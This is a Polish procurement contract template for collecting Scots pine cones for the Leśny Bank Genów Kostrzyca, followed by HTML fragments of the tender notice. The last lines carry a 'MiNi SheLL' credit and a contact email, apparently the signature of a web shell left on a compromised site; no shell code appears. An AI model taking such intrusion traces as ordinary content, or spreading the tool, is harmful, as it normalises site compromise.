Dnia ..2017 roku w Miłkowie pomiędzy Skarbem Państwa  Państwowym Gospodarstwem Leśnym Lasy Państwowe Leśnym Bankiem Genów Kostrzyca z siedzibą                 w Miłkowie, 58  535 Miłków 300, reprezentowanym przez:
1.	.
zwanym dalej Zamawiającym 
a 
reprezentowanym przez:
1.       ...
zwanym  dalej Wykonawcą
zaś wspólnie zwanymi dalej Stronami
w rezultacie dokonania wyboru oferty Wykonawcy złożonej w postępowaniu o udzielenie zamówienia publicznego prowadzonym w trybie przetargu nieograniczonego na podstawie przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U.      z 2015 r., poz. 2164 z późniejszymi zmianami) na wykonanie zadania pn. Zbiór szyszek sosny zwyczajnej, (dalej: Przetarg),
została zawarta umowa (dalej: Umowa) następującej treści:
§ 1.
Przedmiot umowy
1.	Przedmiotem Umowy jest wykonanie przez Wykonawcę na rzecz Zamawiającego zadania polegającego na zbiorze szyszek sosny zwyczajnej -  (dalej: Przedmiot Umowy).
2.	 Szczegółowy zakres rzeczowy czynności składających się na Przedmiot Umowy określony został w specyfikacji istotnych warunków zamówienia dla Przetargu (dalej: SIWZ) stanowiącej Załącznik nr 2 do Umowy. 
3.	Wykonawca zobowiązany jest wykonać Przedmiot Umowy zgodnie z ofertą złożoną w Przetargu stanowiącą Załącznik nr 1 do Umowy, obowiązującymi przepisami, normami, a także na warunkach ustalonych w SIWZ i Umowie. 
4.	SIWZ oraz Oferta Wykonawcy są integralnymi częściami Umowy, z zastrzeżeniem, 
iż pierwszeństwo przed tymi dokumentami ma Umowa. Strony zgodnie postanawiają, iż SIWZ, Oferta Wykonawcy oraz Umowa stanowią dokumenty wzajemnie się uzupełniające 
i wyjaśniające, co oznacza, że w przypadku stwierdzenia jakichkolwiek rozbieżności lub wieloznaczności w ich postanowieniach Wykonawca nie będzie uprawniony do ograniczenia Przedmiotu Umowy, ani zakresu należytej staranności.

§ 2.
Obowiązki Zamawiającego
W ramach prac związanych z realizacją Przedmiotu Umowy Zamawiający zobowiązuje się do:
1)	Wskazania Wykonawcy zarządcy terenu, na którym zlokalizowane jest dane stanowisko;
2)	Uzyskanie zgody zarządcy terenu na wstęp i zbiór materiału rozmnożeniowego zgodnie 
z uzyskanym zezwoleniem;
3)	Przyjęcia uzyskanych w trakcie pierwszej części zbioru partii materiału rozmnożeniowego z 5 drzew z każdego drzewostanu zachowawczego i wykonanie w ciągu 7 dni kalndarzowych oceny przedzbiorowej;
4)	Przekazania informacji Wykonawcy po wykonaniu oceny przedzbiorowej na temat kontynuacji lub braku kontynuacji zbioru w związku z wynikami oceny przedzbiorowej; 
5)	Zamawiający zastrzega, iż w sytuacji, gdy ocena żywotności przedmiotu umowy okaże się niesatysfakcjonująca dla Zamawiającego, Zamawiający zleci mniejszy zakres prac, niż ten, który został przewidziany w SIWZ;
6)	Sprawowania nadzoru nad jakością wykonywanej pracy oraz realizacją warunków Umowy;
7)	Terminowej zapłaty za wykonanie Przedmiotu Umowy.
 § 3.
Obowiązki Wykonawcy
1.	W ramach prac związanych z realizacją Przedmiotu Umowy Wykonawca zobowiązuje się do: 
1)	Wykonania Przedmiotu Umowy określonego w § 1 zgodnie z obowiązującymi zasadami wiedzy, instrukcjami, przepisami i normami obowiązującymi w Państwowym Gospodarstwie Leśnym Lasy Państwowe, przepisami ochrony przeciwpożarowej oraz przestrzegania unormowań ochrony środowiska;
2)	Powiadomienia Zamawiającego o planowanym terminie zbioru, w celu umożliwienia Zamawiającemu zapewnienia nadzoru nad zbiorem, w terminie trzech dni od dnia planowanego zbioru;
3)	Skompletowania niezbędnego w trakcie zbioru wyposażenia i dotarcia do wskazanego stanowiska własnym transportem;
2.	Zgodnie z oświadczeniem zawartym w ofercie Wykonawca nie powierza/powierza podwykonawcy(om) wykonanie następujących części Przedmiotu Umowy.
3.	Możliwość wykonania Przedmiotu Umowy przy udziale podwykonawców w sytuacji, 
gdy Wykonawca nie przewidział ich udziału w swojej ofercie jest dopuszczalna w uzasadnionych przypadkach oraz po uzyskaniu wcześniejszej zgody Zamawiającego wyrażonej na piśmie. 
4.	Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody powstałe na skutek niewykonania lub nienależytego wykonania powierzonych prac wynikających z realizacji Przedmiotu Umowy.
5.	Wykonawca nie może, bez uprzedniej zgody Zamawiającego, przenieść na osobę trzecią praw 
i obowiązków wynikających z Umowy.

§ 4.
 Wykonanie przedmiotu umowy
1.	W trakcie zbiorów Wykonawca zobowiązuje się do:
1)	Zbioru szyszek sosny z drzew stojących, przy użyciu metod bezinwazyjnych,                        z zastosowaniem technik alpinistycznych, nieuszkadzających drzew, konarów i gałęzi.
2)	Uzgodnienia z Zamawiającym zakresu zbioru po wykonaniu przez Zamawiającego oceny przedzbiorowej.
4)	Sporządzenia dokumentacji zbioru wg formularzy opracowanych stanowiących załącznik 
nr 3 do Umowy.
5)	Przesłania zebranego materiału nasiennego do siedziby Zamawiającego maksymalnie 
do 5 dni kalendarzowych od daty zbioru.
6)	Uzgadniania z Zamawiającym sposobu postępowania w każdym przypadku, kiedy masa przedmiotu umowy będzie odbiegała od przyjętych w niniejszej umowie wartości.
2.	Wykonawca zobowiązuje się do prawidłowego i niebudzącego zastrzeżeń oznakowania partii zebranego przedmiotu umowy, zgodnie z formą wskazaną przez Zamawiającego. 
§ 5.
Oświadczenie o znajomości przepisów
Wykonawca oświadcza, że znane mu są przepisy dotyczące prac w gospodarce leśnej, 
a w szczególności Rozporządzenie Ministra Środowiska z dnia 24.08.2006 r. w sprawie bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z zakresu gospodarki leśnej 
(Dz. U. z 2006 r., nr 161, poz. 1141) oraz Instrukcja bezpieczeństwa i higieny pracy przy wykonywaniu podstawowych prac z zakresu gospodarki leśnej (Załącznik do Zarządzenia nr 36 Dyrektora Generalnego Lasów Państwowych z dnia 20.04.2014 r.) i jednocześnie zobowiązuje się do ich przestrzegania. 



§ 6.
Termin wykonywania zamówienia 
1.	Ustala się termin rozpoczęcia realizacji zamówienia od dnia zawarcia umowy, a termin zakończenia realizacji zamówienia do . tygodni od daty zawarcia umowy. 
2.	Do terminu wykonania zamówienia zaoferowanego przez Wykonawcę, Zamawiający doliczy Wykonawcy 1 tydzień, w którym przeprowadzana będzie ocena przedzbiorowa.
§ 7.
Warunki płatności
1.	Strony ustalają, iż wynagrodzenie Wykonawcy z tytułu wykonania Przedmiotu Umowy jest wynagrodzeniem kosztorysowym i zgodnie z ofertą Wykonawcy złożoną w Przetargu wyniesie ... brutto (słownie zł.: .), 
z zastrzeżeniem ust. 2 i 3.
2.	Wynagrodzenie, o którym mowa w ust. 1 obejmuje wszystkie koszty związane z realizacją Przedmiotu Umowy i nie może zostać przekroczone.
3.	Za wykonanie Przedmiotu Umowy Zamawiający zapłaci Wykonawcy wynagrodzenie na podstawie ilości rzeczywiście odebranych i wykonanych prac oraz cen jednostkowych określonych w Formularzu cenowym oferty załączonym do oferty Wykonawcy.
4.	Wynagrodzenie Wykonawcy płatne będzie na podstawie faktury, na konto wskazane 
na fakturze, w terminie do 14 dni od dnia doręczenia prawidłowo wystawionej faktury. Za dzień dokonania zapłaty strony będą uznawać dzień wpływu wynagrodzenia na rachunek bankowy Wykonawcy.
5.	Podstawą do rozliczenia wykonanych prac będą, podpisane przez obie Strony protokoły            z odbioru prac bez zastrzeżeń, z określeniem ilości wykonanych prac.
6.	Strony przyjmują zasadę, że ceny określone Formularzu cenowym oferty załączonym 
do oferty wykonawcy pozostają niezmienne przez cały okres obowiązywania umowy.
7.	Za dzień realizacji płatności uznaje się dzień wpływu środków na konto bankowe Wykonawcy.      W przypadku nieterminowej zapłaty będą naliczane odsetki za opóźnienie w transakcjach handlowych zgodnie z przepisami ustawy z dnia 9 października 2015 roku  o zmianie ustawy         o terminach zapłaty w transakcjach handlowych, ustawy-Kodeks cywilny oraz niektórych innych ustaw (Dz. U. z 2015 r. poz. 1830). 

§ 8. 
Kary umowne
1.	Strony ustalają odpowiedzialność z tytułu niewykonania lub nienależytego wykonania umowy 
w sposób następujący:
1)	Wykonawca zapłaci Zamawiającemu karę umowną w wysokości 5 % wynagrodzenia określonego w § 7 ust. 1 Umowy za każdy drzewostan wymieniony w Formularzu cenowym oferty w przypadku nie przystąpienia do zbiorów z przyczyn leżących po stronie Wykonawcy;
2)	Wykonawca zapłaci Zamawiającemu karę umowną w wysokości 10% wynagrodzenia określonego w § 7 ust. 1 Umowy za rozwiązanie umowy przez Zamawiającego z przyczyn leżących po stronie Wykonawcy;
3)	Zamawiający zapłaci Wykonawcy karę umowną w wysokości 10% wynagrodzenia określonego w § 7 ust. 1 Umowy za rozwiązanie umowy przez Wykonawcę z przyczyn leżących po stronie Zamawiającego. 
2.	Wykonawca nie ponosi odpowiedzialności, jeżeli nie podjęcie zbiorów zostało spowodowane 
z przyczyn leżących po stronie Zamawiającego.
3.	Strony ustalają, iż służy im prawo dochodzenia na zasadach ogólnych odszkodowania uzupełniającego przewyższającego wysokość zastrzeżonych kar umownych.
4.	Za szkody spowodowane osobom trzecim w trakcie realizacji niniejszej Umowy, odpowiada strona, która wyrządziła szkodę.
5.	Wykonawca wyraża zgodę na potrącenie z należnego mu wynagrodzenia naliczonych przez Zamawiającego kar umownych z jakiegokolwiek tytułu przewidzianego w Umowie.






 § 9.
Przedstawiciele stron
1.	Nadzór nad realizacją niniejszej Umowy z ramienia Zamawiającego będzie pełnił 
, tel.:.., e-mail: 
2.	Nadzór nad realizacją niniejszej Umowy z ramienia Wykonawcy będzie pełnił 
, tel.: , e-mail ..
3.	O każdej zmianie osoby lub telefonu kontaktowego każda ze stron  powiadomi drugą stronę przed planowaną zmianą lub w momencie dokonania zmiany. Brak powiadomienia uważa się 
za rażące niewykonanie umowy.
§ 10.
Zmiany i rozwiązanie umowy
1.	Umowa może być rozwiązana przez Stronę w trybie natychmiastowym w przypadku, 
gdy druga Strona narusza warunki Umowy, a w szczególności: 
1)	Naruszania przez Wykonawcę lub jego pracowników zasad bezpieczeństwa i higieny pracy, przepisów przeciwpożarowych, przepisów ochrony środowiska i ochrony przyrody;
2)	Spowodowania przez Wykonawcę lub jego pracowników strat gospodarczych;
3)	Nie wykonywania przez Wykonawcę czynności związanych ze zbiorem materiału nasiennego;  
4)	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy 
nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.
2.	Każda zmiana i uzupełnienie Umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. Poza innymi przypadkami określonymi w treści Umowy, zmiany Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania Umowy. Wskazane powyżej okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nic zawinione i muszą wywoływać ten skutek, iż Umowa nie może być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu Umowy. Okoliczności powyższe odnosić się mogą w szczególności do wystąpienia nagłych zmian stanu prawnego, konieczności uwzględnienia wpływu ewentualnych prac zamiennych na realizację przedmiotu umowy. Poza tym 
3.	Niezależnie od powyższego, Zamawiający dopuszcza możliwość zmian, korzystnych 
z punktu widzenia realizacji w przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy. W takiej sytuacji, Strony wprowadzą do umowy stosowne zmiany weryfikujące dotychczasowe brzmienie kierując się poszanowaniem wzajemnych interesów, zasadą równości oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. 
4.	Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 Prawa zamówień publicznych oraz zasad ogólnych rządzących tą ustawą.
§ 11.
Postanowienia końcowe
1.	Strony będą zwolnione od odpowiedzialności za niewykonanie lub nienależyte wykonanie zobowiązań wynikających z Umowy, o ile niewykonanie lub nienależyte wykonanie zobowiązania nastąpiło wskutek siły wyższej, którą należy rozumieć, jako zdarzenie nagłe, nieprzewidywalne i niezależne od woli stron, uniemożliwiające wykonanie Umowy na stałe lub na pewien czas, zdarzenie, któremu nie można było zapobiec, ani przeciwdziałać przy zachowaniu należytej staranności.
2.	Strona, która zamierza żądać zwolnienia od odpowiedzialności z powodu siły wyższej zobowiązana jest powiadomić drugą stronę na piśmie, bez zbędnej zwłoki, o jej zajściu i ustaniu.
3.	Zaistnienie siły wyższej powinno być udokumentowane przez stronę powołującą się na nią. 
4.	Zamawiający i Wykonawca podejmą starania polubownego rozstrzygnięcia wszelkich sporów powstałych pomiędzy nimi, a wynikających z Umowy lub pozostających w pośrednim bądź bezpośrednim związku z Umową, na drodze bezpośrednich negocjacji.
5.	Sądem wyłącznie właściwym do rozstrzygania wszelkich sposób związanych z niniejszą Umową będzie właściwy rzeczowo sąd powszechny siedziby Zamawiającego.
6.	Umowa podlega prawu polskiemu i zgodnie z nim powinna być interpretowana. W zakresie nieuregulowanym w Umowie znajdują zastosowanie przepisy regulujące kwestię udzielania zamówień publicznych, a w zakresie niesprzecznym z tymi przepisami  Kodeks cywilny.
7.	Integralną częścią umowy są:
1)	Oferta Wykonawcy wraz z Formularzem cenowym  załącznik nr 1;
2)	Specyfikacja Istotnych Warunków Zamówienia dotycząca postępowania o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego pn. Zbiór szyszek sosny zwyczajnej -  załącznik 2;
3)	Formularze dokumentacji zbioru  załącznik nr 3;
8.	Umowę sporządzono w trzech jednobrzmiących egzemplarzach, dwa dla Zamawiającego, jeden dla Wykonawcy.


ZAMAWIAJĄCY							WYKONAWCA




</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">nie dotyczy</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/01/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com